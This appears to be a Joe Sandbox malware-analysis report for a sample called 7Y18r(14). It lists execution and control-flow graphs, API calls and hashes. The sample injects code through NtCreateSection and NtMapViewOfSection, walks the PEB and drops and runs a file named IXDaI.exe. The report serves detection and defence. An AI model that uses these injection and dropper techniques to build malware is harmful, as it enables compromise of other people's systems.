                                                                                      execution_graph 3863 600001 3864 600005 3863->3864 3869 60092b GetPEB 3864->3869 3866 600030 3871 60003c 3866->3871 3870 600972 3869->3870 3870->3866 3872 600049 3871->3872 3873 600e0f 2 API calls 3872->3873 3874 600223 3873->3874 3875 600d90 GetPEB 3874->3875 3876 600238 VirtualAlloc 3875->3876 3877 600265 3876->3877 3878 6002ce VirtualProtect 3877->3878 3880 60030b 3878->3880 3879 600439 VirtualFree 3883 6004be LoadLibraryA 3879->3883 3880->3879 3882 6008c7 3883->3882 3859 402e63 3861 402e67 3859->3861 3860 401918 8 API calls 3862 402f44 3860->3862 3861->3860 3861->3862 3927 401543 3928 401546 3927->3928 3929 4015e6 NtDuplicateObject 3928->3929 3938 401702 3928->3938 3930 401603 NtCreateSection 3929->3930 3929->3938 3931 401683 NtCreateSection 3930->3931 3932 401629 NtMapViewOfSection 3930->3932 3934 4016af 3931->3934 3931->3938 3932->3931 3933 40164c NtMapViewOfSection 3932->3933 3933->3931 3935 40166a 3933->3935 3936 4016b9 NtMapViewOfSection 3934->3936 3934->3938 3935->3931 3937 4016e0 NtMapViewOfSection 3936->3937 3936->3938 3937->3938 3987 401924 3988 401929 3987->3988 3989 40195e Sleep 3988->3989 3990 401979 3989->3990 3991 401538 7 API calls 3990->3991 3992 40198a 3990->3992 3991->3992 3884 600005 3885 60092b GetPEB 3884->3885 3886 600030 3885->3886 3887 60003c 7 API calls 3886->3887 3888 600038 3887->3888 3754 418048 3760 417d6f 3754->3760 3756 418050 3759 417d6f 33 API calls 3756->3759 3785 417af5 GlobalAlloc 3756->3785 3786 417af3 3756->3786 3759->3756 3761 417d7c 3760->3761 3762 417dfa 9 API calls 3761->3762 3766 417e8c 3761->3766 3767 417e74 3762->3767 3763 417e9b GlobalAlloc AddAtomA 3764 417eaa GetCommProperties SetLastError 3763->3764 3765 417ec7 GetProcessDefaultLayout 3764->3765 3764->3766 3765->3766 3766->3763 3766->3764 3768 417ee1 GetConsoleAliasesA 3766->3768 3769 417eda ReleaseActCtx 3766->3769 3770 417f01 FoldStringW 3766->3770 3771 417f19 3766->3771 3767->3766 3768->3766 3769->3768 3770->3766 3772 417f74 3771->3772 3775 417f67 GetConsoleAliasesLengthW 3771->3775 3776 417f49 SetConsoleTitleA LocalFree 3771->3776 3788 417af5 GlobalAlloc 3772->3788 3774 417f99 LoadLibraryA 3789 417b32 3774->3789 3775->3772 3779 417f5d 3776->3779 3779->3775 3782 417ff8 3794 417d30 3782->3794 3784 417ffd 3784->3756 3785->3756 3787 417af8 GlobalAlloc 3786->3787 3787->3756 3788->3774 3790 417b71 3789->3790 3791 417b7d GetModuleHandleW GetProcAddress 3790->3791 3792 417c53 3790->3792 3791->3790 3793 417b14 VirtualProtect 3792->3793 3793->3782 3801 417c78 3794->3801 3796 417d49 3797 417d53 UnhandledExceptionFilter FindFirstVolumeW 3796->3797 3798 417d65 3796->3798 3797->3798 3806 417ccf 3798->3806 3802 417c95 3801->3802 3803 417c8d CreateJobObjectW 3801->3803 3804 417cc4 3802->3804 3805 417ca9 OpenJobObjectW BuildCommDCBW LoadLibraryA 3802->3805 3803->3802 3804->3796 3805->3804 3807 417cdf WritePrivateProfileStringW 3806->3807 3809 417ce9 3806->3809 3807->3809 3808 417d16 3808->3784 3809->3808 3810 417d09 SleepEx 3809->3810 3810->3809 3811 402fe9 3812 403140 3811->3812 3813 403013 3811->3813 3813->3812 3814 4030ce RtlCreateUserThread NtTerminateProcess 3813->3814 3814->3812 3815 4c5000 3817 4c5044 GetPEB 3815->3817 3821 4c5077 CreateFileA 3817->3821 3819 4c522d 3822 4c5246 WriteFile 3819->3822 3823 4c5244 3819->3823 3820 4c5265 3821->3819 3821->3820 3824 4c5255 FindCloseChangeNotification WinExec 3822->3824 3823->3824 3824->3820 3905 401496 3906 401447 3905->3906 3906->3905 3907 4015e6 NtDuplicateObject 3906->3907 3915 40152f 3906->3915 3908 401603 NtCreateSection 3907->3908 3907->3915 3909 401683 NtCreateSection 3908->3909 3910 401629 NtMapViewOfSection 3908->3910 3912 4016af 3909->3912 3909->3915 3910->3909 3911 40164c NtMapViewOfSection 3910->3911 3911->3909 3913 40166a 3911->3913 3914 4016b9 NtMapViewOfSection 3912->3914 3912->3915 3913->3909 3914->3915 3916 4016e0 NtMapViewOfSection 3914->3916 3916->3915 3732 402eb7 3733 402eb8 3732->3733 3735 402f44 3733->3735 3736 401918 3733->3736 3737 401929 3736->3737 3738 40195e Sleep 3737->3738 3739 401979 3738->3739 3741 40198a 3739->3741 3742 401538 3739->3742 3741->3735 3743 401539 3742->3743 3744 4015e6 NtDuplicateObject 3743->3744 3752 401702 3743->3752 3745 401603 NtCreateSection 3744->3745 3744->3752 3746 401683 NtCreateSection 3745->3746 3747 401629 NtMapViewOfSection 3745->3747 3749 4016af 3746->3749 3746->3752 3747->3746 3748 40164c NtMapViewOfSection 3747->3748 3748->3746 3750 40166a 3748->3750 3751 4016b9 NtMapViewOfSection 3749->3751 3749->3752 3750->3746 3751->3752 3753 4016e0 NtMapViewOfSection 3751->3753 3752->3741 3753->3752 3825 60003c 3826 600049 3825->3826 3838 600e0f SetErrorMode SetErrorMode 3826->3838 3831 600265 3832 6002ce VirtualProtect 3831->3832 3834 60030b 3832->3834 3833 600439 VirtualFree 3837 6004be LoadLibraryA 3833->3837 3834->3833 3836 6008c7 3837->3836 3839 600223 3838->3839 3840 600d90 3839->3840 3841 600dad 3840->3841 3842 600dbb GetPEB 3841->3842 3843 600238 VirtualAlloc 3841->3843 3842->3843 3843->3831 3889 4014de 3890 401447 3889->3890 3891 40152f 3890->3891 3892 4015e6 NtDuplicateObject 3890->3892 3892->3891 3893 401603 NtCreateSection 3892->3893 3894 401683 NtCreateSection 3893->3894 3895 401629 NtMapViewOfSection 3893->3895 3894->3891 3897 4016af 3894->3897 3895->3894 3896 40164c NtMapViewOfSection 3895->3896 3896->3894 3898 40166a 3896->3898 3897->3891 3899 4016b9 NtMapViewOfSection 3897->3899 3898->3894 3899->3891 3900 4016e0 NtMapViewOfSection 3899->3900 3900->3891 3844 6e0571 3845 6e0580 3844->3845 3848 6e0d11 3845->3848 3849 6e0d2c 3848->3849 3850 6e0d35 CreateToolhelp32Snapshot 3849->3850 3851 6e0d51 Module32First 3849->3851 3850->3849 3850->3851 3852 6e0589 3851->3852 3853 6e0d60 3851->3853 3855 6e09d0 3853->3855 3856 6e09fb 3855->3856 3857 6e0a0c VirtualAlloc 3856->3857 3858 6e0a44 3856->3858 3857->3858 3858->3858

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 64 4c5044-4c5074 GetPEB 65 4c5077-4c509a 64->65 66 4c509d-4c50a0 65->66 67 4c51ee-4c522b CreateFileA 66->67 68 4c50a6-4c50bc 66->68 92 4c522d-4c5230 67->92 93 4c5265-4c5269 67->93 69 4c50be-4c50c5 68->69 70 4c5110-4c5116 68->70 69->70 71 4c50c7-4c50ce 69->71 73 4c5118-4c511f 70->73 74 4c5129-4c512f 70->74 71->70 77 4c50d0-4c50d7 71->77 73->74 78 4c5121-4c5124 73->78 75 4c5148-4c514e 74->75 76 4c5131-4c5138 74->76 80 4c5167-4c516f 75->80 81 4c5150-4c5157 75->81 76->75 79 4c513a-4c5141 76->79 77->70 82 4c50d9-4c50dd 77->82 84 4c51bb-4c51c0 78->84 79->75 85 4c5143-4c5146 79->85 89 4c5188-4c518e 80->89 90 4c5171-4c5178 80->90 81->80 88 4c5159-4c5160 81->88 82->70 91 4c50df-4c50e3 82->91 86 4c51e0-4c51e9 84->86 87 4c51c2-4c51c5 84->87 85->84 86->66 87->86 95 4c51c7-4c51ca 87->95 88->80 96 4c5162-4c5165 88->96 99 4c51a7-4c51ad 89->99 100 4c5190-4c5197 89->100 90->89 97 4c517a-4c5181 90->97 91->84 98 4c50e9-4c510b 91->98 94 4c5232-4c5238 92->94 102 4c523a-4c5242 94->102 103 4c5246-4c5252 WriteFile 94->103 95->86 104 4c51cc-4c51cf 95->104 96->84 97->89 105 4c5183-4c5186 97->105 98->65 99->84 101 4c51af-4c51b6 99->101 100->99 106 4c5199-4c51a0 100->106 101->84 107 4c51b8 101->107 102->94 108 4c5244 102->108 109 4c5255-4c5262 FindCloseChangeNotification WinExec 103->109 104->86 110 4c51d1-4c51d4 104->110 105->84 106->99 112 4c51a2-4c51a5 106->112 107->84 108->109 109->93 110->86 113 4c51d6-4c51d9 110->113 112->84 113->86 114 4c51db-4c51de 113->114 114->67 114->86
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004C5223
                                                                                      • WriteFile.KERNELBASE(00000000,FFF3C42A,00003E00,?,00000000), ref: 004C5252
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004C5256
                                                                                      • WinExec.KERNEL32(?,00000005), ref: 004C5262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1462189267.00000000004C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C5000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_4c5000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                      • String ID: .dll$Clos$Crea$GetM$GetT$IXDaI.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                                                      • API String ID: 2234911746-2954602755
                                                                                      • Opcode ID: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
                                                                                      • Instruction ID: 076991852e8da1fcb0d4b364c6bdcc5c790ac0df1960d3426473c1dba4c35b1e
                                                                                      • Opcode Fuzzy Hash: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
                                                                                      • Instruction Fuzzy Hash: DA61F878D016159BCF648F94C888FAEB7B4BB44315F5982AFD405A6301CB78AAC1CB99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 200 401496-4014a5 201 4014a7 200->201 202 40151b-40152d 200->202 204 4014a9-4014b5 201->204 205 4014cf 201->205 212 4014ba 202->212 213 40152f-401535 202->213 208 401471-401472 204->208 209 4014b7-4014b8 204->209 206 4014d6 205->206 206->206 210 4014d8 206->210 211 401473-401484 208->211 209->212 214 401449 209->214 210->202 216 40147b-40148e call 4011b7 211->216 218 401447-401456 212->218 219 4014bc-4014c3 212->219 214->216 217 40144b 214->217 216->200 224 40144c-401470 217->224 218->224 220 4014c5-4014c8 219->220 221 401539-401567 219->221 220->205 234 401558-401563 221->234 235 40156a-401590 call 4011b7 221->235 224->211 234->235 242 401592 235->242 243 401595-40159a 235->243 242->243 245 4015a0-4015b1 243->245 246 4018b8-4018c0 243->246 250 4018b6-4018c5 245->250 251 4015b7-4015e0 245->251 246->243 253 4018da 250->253 254 4018cb-4018d6 250->254 251->250 259 4015e6-4015fd NtDuplicateObject 251->259 253->254 256 4018dd-401915 call 4011b7 253->256 254->256 259->250 261 401603-401627 NtCreateSection 259->261 263 401683-4016a9 NtCreateSection 261->263 264 401629-40164a NtMapViewOfSection 261->264 263->250 267 4016af-4016b3 263->267 264->263 266 40164c-401668 NtMapViewOfSection 264->266 266->263 269 40166a-401680 266->269 267->250 270 4016b9-4016da NtMapViewOfSection 267->270 269->263 270->250 272 4016e0-4016fc NtMapViewOfSection 270->272 272->250 276 401702 call 401707 272->276
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                      • String ID:
                                                                                      • API String ID: 1652636561-0
                                                                                      • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                                                      • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                                                      • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                                                      • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 278 401538-401567 284 401558-401563 278->284 285 40156a-401590 call 4011b7 278->285 284->285 292 401592 285->292 293 401595-40159a 285->293 292->293 295 4015a0-4015b1 293->295 296 4018b8-4018c0 293->296 300 4018b6-4018c5 295->300 301 4015b7-4015e0 295->301 296->293 303 4018da 300->303 304 4018cb-4018d6 300->304 301->300 309 4015e6-4015fd NtDuplicateObject 301->309 303->304 306 4018dd-401915 call 4011b7 303->306 304->306 309->300 311 401603-401627 NtCreateSection 309->311 313 401683-4016a9 NtCreateSection 311->313 314 401629-40164a NtMapViewOfSection 311->314 313->300 317 4016af-4016b3 313->317 314->313 316 40164c-401668 NtMapViewOfSection 314->316 316->313 319 40166a-401680 316->319 317->300 320 4016b9-4016da NtMapViewOfSection 317->320 319->313 320->300 322 4016e0-4016fc NtMapViewOfSection 320->322 322->300 326 401702 call 401707 322->326
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                                                      • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                                                      • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                                                      • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 328 4014de-4014ed 329 401563 328->329 330 4014ef 328->330 333 40156a-401590 call 4011b7 329->333 331 401551-401552 330->331 332 4014f1-401502 330->332 331->329 335 401504-401516 332->335 336 40151d-40152d 332->336 351 401592 333->351 352 401595-40159a 333->352 338 40151b-40151c 335->338 341 4014ba 336->341 342 40152f-401535 336->342 338->336 344 401447-401456 341->344 345 4014bc-4014c3 341->345 354 40144c-401470 344->354 346 4014c5-4014c8 345->346 347 401539-401567 345->347 350 4014cf 346->350 347->333 367 401558-401560 347->367 355 4014d6 350->355 351->352 363 4015a0-4015b1 352->363 364 4018b8-4018c0 352->364 366 401473-401484 354->366 355->355 359 4014d8 355->359 359->338 374 4018b6-4018c5 363->374 375 4015b7-4015e0 363->375 364->352 371 40147b-4014a5 call 4011b7 366->371 367->329 371->338 386 4014a7 371->386 378 4018da 374->378 379 4018cb-4018d6 374->379 375->374 387 4015e6-4015fd NtDuplicateObject 375->387 378->379 382 4018dd-401915 call 4011b7 378->382 379->382 386->350 389 4014a9-4014b5 386->389 387->374 390 401603-401627 NtCreateSection 387->390 392 401471-401472 389->392 393 4014b7-4014b8 389->393 394 401683-4016a9 NtCreateSection 390->394 395 401629-40164a NtMapViewOfSection 390->395 392->366 393->341 397 401449 393->397 394->374 399 4016af-4016b3 394->399 395->394 398 40164c-401668 NtMapViewOfSection 395->398 397->371 400 40144b 397->400 398->394 402 40166a-401680 398->402 399->374 403 4016b9-4016da NtMapViewOfSection 399->403 400->354 402->394 403->374 405 4016e0-4016fc NtMapViewOfSection 403->405 405->374 409 401702 call 401707 405->409
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                      • String ID:
                                                                                      • API String ID: 1652636561-0
                                                                                      • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                                                      • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                                                      • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                                                      • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 411 401543-401544 412 401546-401567 411->412 413 4015af-4015b1 411->413 421 401558-401563 412->421 422 40156a-401590 call 4011b7 412->422 415 4018b6-4018c5 413->415 416 4015b7-4015e0 413->416 419 4018da 415->419 420 4018cb-4018d6 415->420 416->415 431 4015e6-4015fd NtDuplicateObject 416->431 419->420 425 4018dd-401915 call 4011b7 419->425 420->425 421->422 440 401592 422->440 441 401595-40159a 422->441 431->415 434 401603-401627 NtCreateSection 431->434 437 401683-4016a9 NtCreateSection 434->437 438 401629-40164a NtMapViewOfSection 434->438 437->415 443 4016af-4016b3 437->443 438->437 442 40164c-401668 NtMapViewOfSection 438->442 440->441 453 4015a0-4015ad 441->453 454 4018b8-4018c0 441->454 442->437 445 40166a-401680 442->445 443->415 446 4016b9-4016da NtMapViewOfSection 443->446 445->437 446->415 449 4016e0-4016fc NtMapViewOfSection 446->449 449->415 455 401702 call 401707 449->455 453->413 454->441
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                                                      • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                                                      • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                                                      • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 459 401565-401590 call 4011b7 464 401592 459->464 465 401595-40159a 459->465 464->465 467 4015a0-4015b1 465->467 468 4018b8-4018c0 465->468 472 4018b6-4018c5 467->472 473 4015b7-4015e0 467->473 468->465 475 4018da 472->475 476 4018cb-4018d6 472->476 473->472 481 4015e6-4015fd NtDuplicateObject 473->481 475->476 478 4018dd-401915 call 4011b7 475->478 476->478 481->472 483 401603-401627 NtCreateSection 481->483 485 401683-4016a9 NtCreateSection 483->485 486 401629-40164a NtMapViewOfSection 483->486 485->472 489 4016af-4016b3 485->489 486->485 488 40164c-401668 NtMapViewOfSection 486->488 488->485 491 40166a-401680 488->491 489->472 492 4016b9-4016da NtMapViewOfSection 489->492 491->485 492->472 494 4016e0-4016fc NtMapViewOfSection 492->494 494->472 498 401702 call 401707 494->498
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                                                      • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                                                      • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                                                      • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 500 401579-401590 call 4011b7 506 401592 500->506 507 401595-40159a 500->507 506->507 509 4015a0-4015b1 507->509 510 4018b8-4018c0 507->510 514 4018b6-4018c5 509->514 515 4015b7-4015e0 509->515 510->507 517 4018da 514->517 518 4018cb-4018d6 514->518 515->514 523 4015e6-4015fd NtDuplicateObject 515->523 517->518 520 4018dd-401915 call 4011b7 517->520 518->520 523->514 525 401603-401627 NtCreateSection 523->525 527 401683-4016a9 NtCreateSection 525->527 528 401629-40164a NtMapViewOfSection 525->528 527->514 531 4016af-4016b3 527->531 528->527 530 40164c-401668 NtMapViewOfSection 528->530 530->527 533 40166a-401680 530->533 531->514 534 4016b9-4016da NtMapViewOfSection 531->534 533->527 534->514 536 4016e0-4016fc NtMapViewOfSection 534->536 536->514 540 401702 call 401707 536->540
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                                                      • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                                                      • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                                                      • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 542 40157c-401590 call 4011b7 546 401592 542->546 547 401595-40159a 542->547 546->547 549 4015a0-4015b1 547->549 550 4018b8-4018c0 547->550 554 4018b6-4018c5 549->554 555 4015b7-4015e0 549->555 550->547 557 4018da 554->557 558 4018cb-4018d6 554->558 555->554 563 4015e6-4015fd NtDuplicateObject 555->563 557->558 560 4018dd-401915 call 4011b7 557->560 558->560 563->554 565 401603-401627 NtCreateSection 563->565 567 401683-4016a9 NtCreateSection 565->567 568 401629-40164a NtMapViewOfSection 565->568 567->554 571 4016af-4016b3 567->571 568->567 570 40164c-401668 NtMapViewOfSection 568->570 570->567 573 40166a-401680 570->573 571->554 574 4016b9-4016da NtMapViewOfSection 571->574 573->567 574->554 576 4016e0-4016fc NtMapViewOfSection 574->576 576->554 580 401702 call 401707 576->580
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                                                      • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                                                      • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                                                      • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
